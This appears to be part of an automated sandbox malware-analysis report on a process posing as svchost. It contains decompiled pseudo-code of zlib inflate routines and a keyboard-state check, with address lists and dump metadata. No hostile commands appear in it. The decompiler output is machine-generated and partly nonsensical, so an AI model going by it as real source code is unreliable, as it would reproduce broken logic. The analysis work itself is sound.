									 *_t235 =  *_t235 + 1;
									 *( *(_t235 + 0x1c)) = 5;
									goto L44;
								} else {
									return _t233;
								}
								goto L52;
							case 5:
								L44:
								_t163 =  *((intOrPtr*)(_t235 + 4));
								if(_t163 != 0) {
									 *((intOrPtr*)(_t235 + 4)) = _t163 - 1;
									 *((intOrPtr*)(_t235 + 8)) =  *((intOrPtr*)(_t235 + 8)) + 1;
									( *(_t235 + 0x1c))[2] = ( *(_t235 + 0x1c))[2];
									 *_t235 =  *_t235 + 1;
									_t168 =  *(_t235 + 0x1c);
									 *(_t235 + 0x30) = _t168[2];
									 *_t168 = 6;
									return 2;
								} else {
									return _t234;
								}
								goto L52;
							case 6:
								 *(__esi[7]) = 0xd;
								__eax = __esi[7];
								__esi[6] = "need dictionary";
								 *((intOrPtr*)(__esi[7] + 4)) = 0;
								goto L48;
							case 7:
								_push(__edi);
								_push(__esi);
								_push( *((intOrPtr*)(__eax + 0x14)));
								__edi = E004577A0();
								__esp = __esp + 0xc;
								if(__edi != 0xfffffffd) {
									if(__edi == 0) {
										__edi = __ebx;
									}
									if(__edi != 1) {
										goto L36;
									} else {
										__eax = __esi[7];
										__edi = __ebx;
										__eax = E00457720( *((intOrPtr*)(__esi[7] + 0x14)), __esi, __esi[7] + 4);
										__eax = __esi[7];
										if( *((intOrPtr*)(__eax + 0xc)) == 0) {
											 *__eax = 8;
											goto L25;
										} else {
											 *__eax = 0xc;
											goto L4;
										}
									}
								} else {
									 *(__esi[7]) = 0xd;
									__eax = __esi[7];
									 *((intOrPtr*)(__eax + 4)) = 0;
									goto L4;
								}
								goto L52;
							case 8:
								L25:
								__eax = __esi[1];
								if(__eax == 0) {
									goto L36;
								} else {
									__esi[1] = __eax;
									__esi[2] = __esi[2] + 1;
									__esi[2] = __esi[2] + 1;
									__eax =  *__esi;
									__edi = __ebx;
									 *(__esi[7] + 8) = 0 << 0x18;
									 *__esi =  *__esi + 1;
									 *__esi =  *__esi + 1;
									__eax = __esi[7];
									 *(__esi[7]) = 9;
									goto L27;
								}
								goto L52;
							case 9:
								L27:
								__eax = __esi[1];
								if(__eax == 0) {
									goto L36;
								} else {
									__eax = __eax - 1;
									__esi[2] = __esi[2] + 1;
									__esi[1] = __eax;
									__eax = __esi[7];
									__edi = __ebx;
									 *(__esi[7] + 8) =  *(__esi[7] + 8) + (0 << 0x10);
									 *__esi =  *__esi + 1;
									 *__esi =  *__esi + 1;
									__eax = __esi[7];
									 *(__esi[7]) = 0xa;
									goto L29;
								}
								goto L52;
							case 0xa:
								L29:
								__eax = __esi[1];
								if(__eax == 0) {
									goto L36;
								} else {
									__eax = __eax - 1;
									__esi[2] = __esi[2] + 1;
									__esi[1] = __eax;
									__eax = __esi[7];
									__edi = __ebx;
									 *(__esi[7] + 8) =  *(__esi[7] + 8) + (0 << 8);
									 *__esi =  *__esi + 1;
									 *__esi =  *__esi + 1;
									__eax = __esi[7];
									 *(__esi[7]) = 0xb;
									goto L31;
								}
								goto L52;
							case 0xb:
								L31:
								__eax = __esi[1];
								if(__eax == 0) {
									L36:
									return _t231;
								} else {
									__esi[1] = __eax;
									__eax = __esi[7];
									__esi[2] = __esi[2] + 1;
									__edi = __ebx;
									 *(__esi[7] + 8) =  *(__esi[7] + 8);
									 *__esi =  *__esi + 1;
									 *__esi =  *__esi + 1;
									__eax = __esi[7];
									if( *((intOrPtr*)(__eax + 4)) ==  *((intOrPtr*)(__eax + 8))) {
										 *(__esi[7]) = 0xc;
										goto L50;
									} else {
										 *__eax = 0xd;
										__esi[6] = "incorrect data check";
										 *((intOrPtr*)(__esi[7] + 4)) = __ebp;
										goto L4;
									}
								}
								goto L52;
							case 0xc:
								L50:
								__eax = 1;
								return 1;
								goto L52;
							case 0xd:
								__eax = 0xfffffffd;
								return 0xfffffffd;
								goto L52;
						}
					}
					goto L48;
				}
				L52:
			}









    0x0044a173
    0x0044a17a
    0x0044a543
    0x0044a549
    0x0044a194
    0x0044a19d
    0x0044a1a6
    0x0044a1ab
    0x0044a1ae
    0x0044a1b2
    0x0044a1b2
    0x0044a1b2
    0x0044a1b5
    0x0044a1ba
    0x00000000
    0x00000000
    0x0044a1c0
    0x00000000
    0x0044a1c7
    0x0044a1cc
    0x00000000
    0x0044a1d2
    0x0044a1d5
    0x0044a1dc
    0x0044a1de
    0x0044a1e5
    0x0044a1e8
    0x0044a1f7
    0x0044a1f9
    0x0044a21e
    0x0044a238
    0x00000000
    0x0044a220
    0x0044a220
    0x0044a229
    0x0044a230
    0x00000000
    0x0044a230
    0x0044a1fb
    0x0044a1fb
    0x0044a204
    0x0044a20b
    0x00000000
    0x0044a20b
    0x0044a1f9
    0x00000000
    0x00000000
    0x0044a23e
    0x0044a23e
    0x0044a243
    0x00000000
    0x0044a249
    0x0044a24c
    0x0044a253
    0x0044a255
    0x0044a258
    0x0044a25b
    0x0044a264
    0x0044a267
    0x0044a275
    0x0044a29b
    0x0044a421
    0x0044a42a
    0x00000000
    0x0044a2a1
    0x0044a2a1
    0x0044a2a7
    0x0044a2ab
    0x00000000
    0x0044a2ab
    0x0044a277
    0x0044a277
    0x0044a280
    0x0044a284
    0x0044a289
    0x0044a290
    0x00000000
    0x0044a290
    0x0044a275
    0x00000000
    0x00000000
    0x0044a430
    0x0044a430
    0x0044a435
    0x0044a445
    0x0044a44a
    0x0044a452
    0x0044a457
    0x0044a460
    0x0044a462
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x0044a468
    0x0044a468
    0x0044a46d
    0x0044a479
    0x0044a482
    0x0044a48a
    0x0044a494
    0x0044a49d
    0x0044a49f
    0x00000000
    0x0044a46f
    0x0044a475
    0x0044a475
    0x00000000
    0x00000000
    0x0044a4a5
    0x0044a4a5
    0x0044a4aa
    0x0044a4b6
    0x0044a4bf
    0x0044a4c7
    0x0044a4d1
    0x0044a4d7
    0x0044a4dc
    0x00000000
    0x0044a4ac
    0x0044a4b2
    0x0044a4b2
    0x00000000
    0x00000000
    0x0044a4de
    0x0044a4de
    0x0044a4e3
    0x0044a4f3
    0x0044a4f9
    0x0044a506
    0x0044a50c
    0x0044a50e
    0x0044a514
    0x0044a518
    0x0044a525
    0x0044a4e5
    0x0044a4eb
    0x0044a4eb
    0x00000000
    0x00000000
    0x0044a529
    0x0044a52f
    0x0044a532
    0x0044a539
    0x00000000
    0x00000000
    0x0044a2b8
    0x0044a2b9
    0x0044a2ba
    0x0044a2c0
    0x0044a2c2
    0x0044a2c8
    0x0044a2e4
    0x0044a2e6
    0x0044a2e6
    0x0044a2eb
    0x00000000
    0x0044a2f1
    0x0044a2f1
    0x0044a2f4
    0x0044a2ff
    0x0044a304
    0x0044a30f
    0x0044a31c
    0x00000000
    0x0044a311
    0x0044a311
    0x00000000
    0x0044a311
    0x0044a30f
    0x0044a2ca
    0x0044a2cd
    0x0044a2d3
    0x0044a2d6
    0x00000000
    0x0044a2d6
    0x00000000
    0x00000000
    0x0044a322
    0x0044a322
    0x0044a327
    0x00000000
    0x0044a32d
    0x0044a331
    0x0044a337
    0x0044a33a
    0x0044a33d
    0x0044a33f
    0x0044a346
    0x0044a34b
    0x0044a34c
    0x0044a34e
    0x0044a351
    0x00000000
    0x0044a351
    0x00000000
    0x00000000
    0x0044a357
    0x0044a357
    0x0044a35c
    0x00000000
    0x0044a362
    0x0044a367
    0x0044a369
    0x0044a36c
    0x0044a36f
    0x0044a376
    0x0044a380
    0x0044a385
    0x0044a386
    0x0044a388
    0x0044a38b
    0x00000000
    0x0044a38b
    0x00000000
    0x00000000
    0x0044a391
    0x0044a391
    0x0044a396
    0x00000000
    0x0044a39c
    0x0044a3a1
    0x0044a3a3
    0x0044a3a6
    0x0044a3a9
    0x0044a3b0
    0x0044a3ba
    0x0044a3bf
    0x0044a3c0
    0x0044a3c2
    0x0044a3c5
    0x00000000
    0x0044a3c5
    0x00000000
    0x00000000
    0x0044a3cb
    0x0044a3cb
    0x0044a3d0
    0x0044a437
    0x0044a43d
    0x0044a3d2
    0x0044a3d9
    0x0044a3dc
    0x0044a3df
    0x0044a3eb
    0x0044a3ed
    0x0044a3f2
    0x0044a3f3
    0x0044a3f5
    0x0044a400
    0x0044a54d
    0x00000000
    0x0044a406
    0x0044a406
    0x0044a40f
    0x0044a416
    0x00000000
    0x0044a416
    0x0044a400
    0x00000000
    0x00000000
    0x0044a556
    0x0044a556
    0x0044a55c
    0x00000000
    0x00000000
    0x0044a560
    0x0044a566
    0x00000000
    0x00000000
    0x0044a1c0
    0x00000000
    0x0044a1b2
    0x00000000

    Strings
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID:
    • String ID: incorrect data check$incorrect header check$invalid window size$need dictionary$unknown compression method
    • API String ID: 0-2151277842
    • Opcode ID: 1f6f0b4644a23bd9a9b449cb1930b95cb91ac2a15b87c7039d48454153f42337
    • Instruction ID: 308507108e797b50b406cd64158127af8e156c807818d8a25e0ac970881b0078
    • Opcode Fuzzy Hash: 1f6f0b4644a23bd9a9b449cb1930b95cb91ac2a15b87c7039d48454153f42337
    • Instruction Fuzzy Hash: 06E1D2B5600A018FD324CF19D490A26FBF2EF89310B29C96ED49ACBB61D735E846CB54
    Uniqueness

    Uniqueness Score: -1.00%

    Function 00464BF0 Relevance: 6.6, Strings: 5, Instructions: 373COMMONCrypto
    Download Yara Rule
    C-Code - Quality: 98%
    			E00464BF0(intOrPtr* _a4, signed int _a8) {
				signed int* _t129;
				signed int _t177;
				signed int _t180;
				signed int _t231;
				intOrPtr* _t235;
				signed int _t236;

				_t235 = _a4;
				if(_t235 == 0 ||  *(_t235 + 0x1c) == 0 ||  *_t235 == 0) {
					L48:
					return 0xfffffffe;
				} else {
					_t231 = 0xfffffffb;
					_t236 = 5;
					_t177 = (0 | _a8 != 0x00000004) - 0x00000001 & 0xfffffffb;
					_a8 = _t177;
					while(1) {
						L4:
						_t129 =  *(_t235 + 0x1c);
						_t180 =  *_t129;
						if(_t180 > 0xd) {
							goto L48;
						}
						switch( *((intOrPtr*)(_t180 * 4 +  &M00464FE8))) {
							case 0:
								_t181 =  *((intOrPtr*)(_t235 + 4));
								if(_t181 == 0) {
									goto L36;
								} else {
									 *((intOrPtr*)(_t235 + 4)) = _t181 - 1;
									_t231 = _t177;
									 *((intOrPtr*)(_t235 + 8)) =  *((intOrPtr*)(_t235 + 8)) + 1;
									_t129[1] = 0;
									_t131 =  *(_t235 + 0x1c);
									 *_t235 =  *_t235 + 1;
									if((_t131[1] & 0x0000000f) == 8) {
										if((_t131[1] >> 4) + 8 <= _t131[4]) {
											 *_t131 = 1;
											goto L12;
										} else {
											 *_t131 = 0xd;
											 *(_t235 + 0x18) = "invalid window size";
											( *(_t235 + 0x1c))[1] = _t236;
											goto L4;
										}
									} else {
										 *_t131 = 0xd;
										 *(_t235 + 0x18) = "unknown compression method";
										( *(_t235 + 0x1c))[1] = _t236;
										goto L4;
									}
								}
								goto L52;
							case 1:
								L12:
								_t132 =  *((intOrPtr*)(_t235 + 4));
								if(_t132 == 0) {
									goto L36;
								} else {
									 *((intOrPtr*)(_t235 + 4)) = _t132 - 1;
									_t231 = _t177;
									_t178 =  *(_t235 + 0x1c);
									 *((intOrPtr*)(_t235 + 8)) =  *((intOrPtr*)(_t235 + 8)) + 1;
									_t136 =  *_t235;
									_t192 =  *_t136;
									 *_t235 = _t136 + 1;
									if((_t178[1] << 8) % 0x1f == 0) {
										if((_t192 & 0x00000020) != 0) {
											_t179 = _a8;
											 *( *(_t235 + 0x1c)) = 2;
											goto L35;
										} else {
											 *_t178 = 7;
											_t177 = _a8;
											_t236 = 5;
											goto L4;
										}
									} else {
										 *_t178 = 0xd;
										_t177 = _a8;
										_t236 = 5;
										 *(_t235 + 0x18) = "incorrect header check";
										( *(_t235 + 0x1c))[1] = 5;
										goto L4;
									}
								}
								goto L52;
							case 2:
								L35:
								_t143 =  *((intOrPtr*)(_t235 + 4));
								if(_t143 != 0) {
									 *((intOrPtr*)(_t235 + 8)) =  *((intOrPtr*)(_t235 + 8)) + 1;
									 *((intOrPtr*)(_t235 + 4)) = _t143 - 1;
									_t232 = _t179;
									( *(_t235 + 0x1c))[2] = 0 << 0x18;
									 *_t235 =  *_t235 + 1;
									 *( *(_t235 + 0x1c)) = 3;
									goto L38;
								} else {
									goto L36;
								}
								goto L52;
							case 3:
								L38:
								_t148 =  *((intOrPtr*)(_t235 + 4));
								if(_t148 != 0) {
									 *((intOrPtr*)(_t235 + 4)) = _t148 - 1;
									 *((intOrPtr*)(_t235 + 8)) =  *((intOrPtr*)(_t235 + 8)) + 1;
									_t233 = _t179;
									( *(_t235 + 0x1c))[2] = ( *(_t235 + 0x1c))[2] + (0 << 0x10);
									 *_t235 =  *_t235 + 1;
									 *( *(_t235 + 0x1c)) = 4;
									goto L41;
								} else {
									return _t232;
								}
								goto L52;
							case 4:
								L41:
								_t155 =  *((intOrPtr*)(_t235 + 4));
								if(_t155 != 0) {
									 *((intOrPtr*)(_t235 + 4)) = _t155 - 1;
									 *((intOrPtr*)(_t235 + 8)) =  *((intOrPtr*)(_t235 + 8)) + 1;
									_t234 = _t179;
									( *(_t235 + 0x1c))[2] = ( *(_t235 + 0x1c))[2] + (0 << 8);
									 *_t235 =  *_t235 + 1;
									 *( *(_t235 + 0x1c)) = 5;
									goto L44;
								} else {
									return _t233;
								}
								goto L52;
							case 5:
								L44:
								_t163 =  *((intOrPtr*)(_t235 + 4));
								if(_t163 != 0) {
									 *((intOrPtr*)(_t235 + 4)) = _t163 - 1;
									 *((intOrPtr*)(_t235 + 8)) =  *((intOrPtr*)(_t235 + 8)) + 1;
									( *(_t235 + 0x1c))[2] = ( *(_t235 + 0x1c))[2];
									 *_t235 =  *_t235 + 1;
									_t168 =  *(_t235 + 0x1c);
									 *(_t235 + 0x30) = _t168[2];
									 *_t168 = 6;
									return 2;
								} else {
									return _t234;
								}
								goto L52;
							case 6:
								 *(__esi[7]) = 0xd;
								__eax = __esi[7];
								__esi[6] = "need dictionary";
								 *((intOrPtr*)(__esi[7] + 4)) = 0;
								goto L48;
							case 7:
								_push(__edi);
								_push(__esi);
								_push( *((intOrPtr*)(__eax + 0x14)));
								__edi = E00466800();
								__esp = __esp + 0xc;
								if(__edi != 0xfffffffd) {
									if(__edi == 0) {
										__edi = __ebx;
									}
									if(__edi != 1) {
										goto L36;
									} else {
										__eax = __esi[7];
										__edi = __ebx;
										__eax = E00457720( *((intOrPtr*)(__esi[7] + 0x14)), __esi, __esi[7] + 4);
										__eax = __esi[7];
										if( *((intOrPtr*)(__eax + 0xc)) == 0) {
											 *__eax = 8;
											goto L25;
										} else {
											 *__eax = 0xc;
											goto L4;
										}
									}
								} else {
									 *(__esi[7]) = 0xd;
									__eax = __esi[7];
									 *((intOrPtr*)(__eax + 4)) = 0;
									goto L4;
								}
								goto L52;
							case 8:
								L25:
								__eax = __esi[1];
								if(__eax == 0) {
									goto L36;
								} else {
									__esi[1] = __eax;
									__esi[2] = __esi[2] + 1;
									__esi[2] = __esi[2] + 1;
									__eax =  *__esi;
									__edi = __ebx;
									 *(__esi[7] + 8) = 0 << 0x18;
									 *__esi =  *__esi + 1;
									 *__esi =  *__esi + 1;
									__eax = __esi[7];
									 *(__esi[7]) = 9;
									goto L27;
								}
								goto L52;
							case 9:
								L27:
								__eax = __esi[1];
								if(__eax == 0) {
									goto L36;
								} else {
									__eax = __eax - 1;
									__esi[2] = __esi[2] + 1;
									__esi[1] = __eax;
									__eax = __esi[7];
									__edi = __ebx;
									 *(__esi[7] + 8) =  *(__esi[7] + 8) + (0 << 0x10);
									 *__esi =  *__esi + 1;
									 *__esi =  *__esi + 1;
									__eax = __esi[7];
									 *(__esi[7]) = 0xa;
									goto L29;
								}
								goto L52;
							case 0xa:
								L29:
								__eax = __esi[1];
								if(__eax == 0) {
									goto L36;
								} else {
									__eax = __eax - 1;
									__esi[2] = __esi[2] + 1;
									__esi[1] = __eax;
									__eax = __esi[7];
									__edi = __ebx;
									 *(__esi[7] + 8) =  *(__esi[7] + 8) + (0 << 8);
									 *__esi =  *__esi + 1;
									 *__esi =  *__esi + 1;
									__eax = __esi[7];
									 *(__esi[7]) = 0xb;
									goto L31;
								}
								goto L52;
							case 0xb:
								L31:
								__eax = __esi[1];
								if(__eax == 0) {
									L36:
									return _t231;
								} else {
									__esi[1] = __eax;
									__eax = __esi[7];
									__esi[2] = __esi[2] + 1;
									__edi = __ebx;
									 *(__esi[7] + 8) =  *(__esi[7] + 8);
									 *__esi =  *__esi + 1;
									 *__esi =  *__esi + 1;
									__eax = __esi[7];
									if( *((intOrPtr*)(__eax + 4)) ==  *((intOrPtr*)(__eax + 8))) {
										 *(__esi[7]) = 0xc;
										goto L50;
									} else {
										 *__eax = 0xd;
										__esi[6] = "incorrect data check";
										 *((intOrPtr*)(__esi[7] + 4)) = __ebp;
										goto L4;
									}
								}
								goto L52;
							case 0xc:
								L50:
								__eax = 1;
								return 1;
								goto L52;
							case 0xd:
								__eax = 0xfffffffd;
								return 0xfffffffd;
								goto L52;
						}
					}
					goto L48;
				}
				L52:
			}









    0x00464bf3
    0x00464bfa
    0x00464fc3
    0x00464fc9
    0x00464c14
    0x00464c1d
    0x00464c26
    0x00464c2b
    0x00464c2e
    0x00464c32
    0x00464c32
    0x00464c32
    0x00464c35
    0x00464c3a
    0x00000000
    0x00000000
    0x00464c40
    0x00000000
    0x00464c47
    0x00464c4c
    0x00000000
    0x00464c52
    0x00464c55
    0x00464c5c
    0x00464c5e
    0x00464c65
    0x00464c68
    0x00464c77
    0x00464c79
    0x00464c9e
    0x00464cb8
    0x00000000
    0x00464ca0
    0x00464ca0
    0x00464ca9
    0x00464cb0
    0x00000000
    0x00464cb0
    0x00464c7b
    0x00464c7b
    0x00464c84
    0x00464c8b
    0x00000000
    0x00464c8b
    0x00464c79
    0x00000000
    0x00000000
    0x00464cbe
    0x00464cbe
    0x00464cc3
    0x00000000
    0x00464cc9
    0x00464ccc
    0x00464cd3
    0x00464cd5
    0x00464cd8
    0x00464cdb
    0x00464ce4
    0x00464ce7
    0x00464cf5
    0x00464d1b
    0x00464ea1
    0x00464eaa
    0x00000000
    0x00464d21
    0x00464d21
    0x00464d27
    0x00464d2b
    0x00000000
    0x00464d2b
    0x00464cf7
    0x00464cf7
    0x00464d00
    0x00464d04
    0x00464d09
    0x00464d10
    0x00000000
    0x00464d10
    0x00464cf5
    0x00000000
    0x00000000
    0x00464eb0
    0x00464eb0
    0x00464eb5
    0x00464ec5
    0x00464eca
    0x00464ed2
    0x00464ed7
    0x00464ee0
    0x00464ee2
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00464ee8
    0x00464ee8
    0x00464eed
    0x00464ef9
    0x00464f02
    0x00464f0a
    0x00464f14
    0x00464f1d
    0x00464f1f
    0x00000000
    0x00464eef
    0x00464ef5
    0x00464ef5
    0x00000000
    0x00000000
    0x00464f25
    0x00464f25
    0x00464f2a
    0x00464f36
    0x00464f3f
    0x00464f47
    0x00464f51
    0x00464f57
    0x00464f5c
    0x00000000
    0x00464f2c
    0x00464f32
    0x00464f32
    0x00000000
    0x00000000
    0x00464f5e
    0x00464f5e
    0x00464f63
    0x00464f73
    0x00464f79
    0x00464f86
    0x00464f8c
    0x00464f8e
    0x00464f94
    0x00464f98
    0x00464fa5
    0x00464f65
    0x00464f6b
    0x00464f6b
    0x00000000
    0x00000000
    0x00464fa9
    0x00464faf
    0x00464fb2
    0x00464fb9
    0x00000000
    0x00000000
    0x00464d38
    0x00464d39
    0x00464d3a
    0x00464d40
    0x00464d42
    0x00464d48
    0x00464d64
    0x00464d66
    0x00464d66
    0x00464d6b
    0x00000000
    0x00464d71
    0x00464d71
    0x00464d74
    0x00464d7f
    0x00464d84
    0x00464d8f
    0x00464d9c
    0x00000000
    0x00464d91
    0x00464d91
    0x00000000
    0x00464d91
    0x00464d8f
    0x00464d4a
    0x00464d4d
    0x00464d53
    0x00464d56
    0x00000000
    0x00464d56
    0x00000000
    0x00000000
    0x00464da2
    0x00464da2
    0x00464da7
    0x00000000
    0x00464dad
    0x00464db1
    0x00464db7
    0x00464dba
    0x00464dbd
    0x00464dbf
    0x00464dc6
    0x00464dcb
    0x00464dcc
    0x00464dce
    0x00464dd1
    0x00000000
    0x00464dd1
    0x00000000
    0x00000000
    0x00464dd7
    0x00464dd7
    0x00464ddc
    0x00000000
    0x00464de2
    0x00464de7
    0x00464de9
    0x00464dec
    0x00464def
    0x00464df6
    0x00464e00
    0x00464e05
    0x00464e06
    0x00464e08
    0x00464e0b
    0x00000000
    0x00464e0b
    0x00000000
    0x00000000
    0x00464e11
    0x00464e11
    0x00464e16
    0x00000000
    0x00464e1c
    0x00464e21
    0x00464e23
    0x00464e26
    0x00464e29
    0x00464e30
    0x00464e3a
    0x00464e3f
    0x00464e40
    0x00464e42
    0x00464e45
    0x00000000
    0x00464e45
    0x00000000
    0x00000000
    0x00464e4b
    0x00464e4b
    0x00464e50
    0x00464eb7
    0x00464ebd
    0x00464e52
    0x00464e59
    0x00464e5c
    0x00464e5f
    0x00464e6b
    0x00464e6d
    0x00464e72
    0x00464e73
    0x00464e75
    0x00464e80
    0x00464fcd
    0x00000000
    0x00464e86
    0x00464e86
    0x00464e8f
    0x00464e96
    0x00000000
    0x00464e96
    0x00464e80
    0x00000000
    0x00000000
    0x00464fd6
    0x00464fd6
    0x00464fdc
    0x00000000
    0x00000000
    0x00464fe0
    0x00464fe6
    0x00000000
    0x00000000
    0x00464c40
    0x00000000
    0x00464c32
    0x00000000

    Strings
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID:
    • String ID: incorrect data check$incorrect header check$invalid window size$need dictionary$unknown compression method
    • API String ID: 0-2151277842
    • Opcode ID: 2a88a98287c68e7c6b7ad2147af1f79b51ec828034c31d7a61558b12580fba8e
    • Instruction ID: 1ad95f0c2d16bc8042050f1dfa220393888d0d89ccd67f26a4b99736583f6420
    • Opcode Fuzzy Hash: 2a88a98287c68e7c6b7ad2147af1f79b51ec828034c31d7a61558b12580fba8e
    • Instruction Fuzzy Hash: B0E1F4B5600A018FD738CF19D490A12FBE2FF89310B25C96ED59ACBB61E735E846CB54
    Uniqueness

    Uniqueness Score: -1.00%

    Function 00486887 Relevance: 6.0, APIs: 4, Instructions: 38keyboardwindowCOMMON
    Download Yara Rule
    C-Code - Quality: 100%
    			E00486887(void* __ecx) {
				void* _t11;
				void* _t12;
				void* _t16;

				_t12 = __ecx;
				if((E004874EA(__ecx) & 0x40000000) != 0) {
					L6:
					return E00484BEB(_t12);
				}
				_t16 = E0046F80D();
				if(_t16 == 0 || GetKeyState(0x10) < 0 || GetKeyState(0x11) < 0 || GetKeyState(0x12) < 0) {
					goto L6;
				} else {
					SendMessageA( *(_t16 + 0x1c), 0x111, 0xe146, 0);
					_t11 = 1;
					return _t11;
				}
			}






    0x0048688a
    0x00486896
    0x004868de
    0x00000000
    0x004868e0
    0x0048689d
    0x004868a1
    0x00000000
    0x004868c4
    0x004868d3
    0x004868db
    0x00000000
    0x004868db

    APIs
      • Part of subcall function 004874EA: GetWindowLongA.USER32(?,000000F0), ref: 004874F6
    • GetKeyState.USER32(00000010), ref: 004868AB
    • GetKeyState.USER32(00000011), ref: 004868B4
    • GetKeyState.USER32(00000012), ref: 004868BD
    • SendMessageA.USER32(?,00000111,0000E146,00000000), ref: 004868D3
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: State$LongMessageSendWindow
    • String ID:
    • API String ID: 1063413437-0
    • Opcode ID: 8d9cad45b61e3fc8e41001a9f3c073cfe812306e50b30b7cf0ae3639dd6f7e82
    • Instruction ID: 695cd474cf26c759a1449143a75662647d6dc83257c4ad955ca9ec150f5d95e2
    • Opcode Fuzzy Hash: 8d9cad45b61e3fc8e41001a9f3c073cfe812306e50b30b7cf0ae3639dd6f7e82
    • Instruction Fuzzy Hash: D8F0E236B0236A37E66032612C46FAD01150B90BA8F020C3BBB04BB1D18AD9C8125378
    Uniqueness

    Uniqueness Score: -1.00%

    Function 00466800 Relevance: 4.8, Strings: 3, Instructions: 1089COMMONCrypto
    Download Yara Rule
    C-Code - Quality: 94%
    			E00466800() {
				signed int* _t450;
				signed int _t452;
				void* _t454;
				signed int _t455;
				signed int _t456;
				signed int* _t465;
				signed int _t467;
				signed int _t469;
				signed int _t501;
				void* _t503;
				void* _t507;

				_t450 =  *(_t507 + 0x38);
				_t465 =  *(_t507 + 0x38);
				_t501 = _t465[7];
				 *(_t507 + 8) =  *_t450;
				_t467 = _t465[0xd];
				 *(_t507 + 0x10) = _t465[8];
				_t452 = _t465[0xc];
				 *(_t507 + 0x14) = _t450[1];
				 *(_t507 + 0x44) = _t467;
				if(_t467 >= _t452) {
					_t454 = _t465[0xb] - _t467;
				} else {
					_t454 = _t452 - _t467 - 1;
				}
				 *(_t507 + 0x1c) = _t454;
				while(1) {
					L4:
					_t455 =  *_t465;
					if(_t455 > 9) {
						break;
					}
					switch( *((intOrPtr*)(_t455 * 4 +  &M004674C0))) {
						case 0:
							_t497 =  *(_t507 + 0x18);
							if(_t501 >= 3) {
								goto L12;
							} else {
								_t461 =  *(_t507 + 0x14);
								_t492 =  *(_t507 + 0x10);
								while(_t461 != 0) {
									_t461 = _t461 - 1;
									 *(_t507 + 0x4c) = 0;
									_t488 = 0 << _t501;
									_t501 = 8 + _t501;
									 *(_t507 + 0x14) = _t461;
									_t497 = _t497 | _t488;
									_t492 = _t492 + 1;
									 *(_t507 + 0x18) = _t497;
									 *(_t507 + 0x10) = _t492;
									if(_t501 < 3) {
										continue;
									} else {
										L12:
										_t459 = _t497 & 0x00000007;
										_t460 = _t459 >> 1;
										_t465[6] = _t459 & 0x00000001;
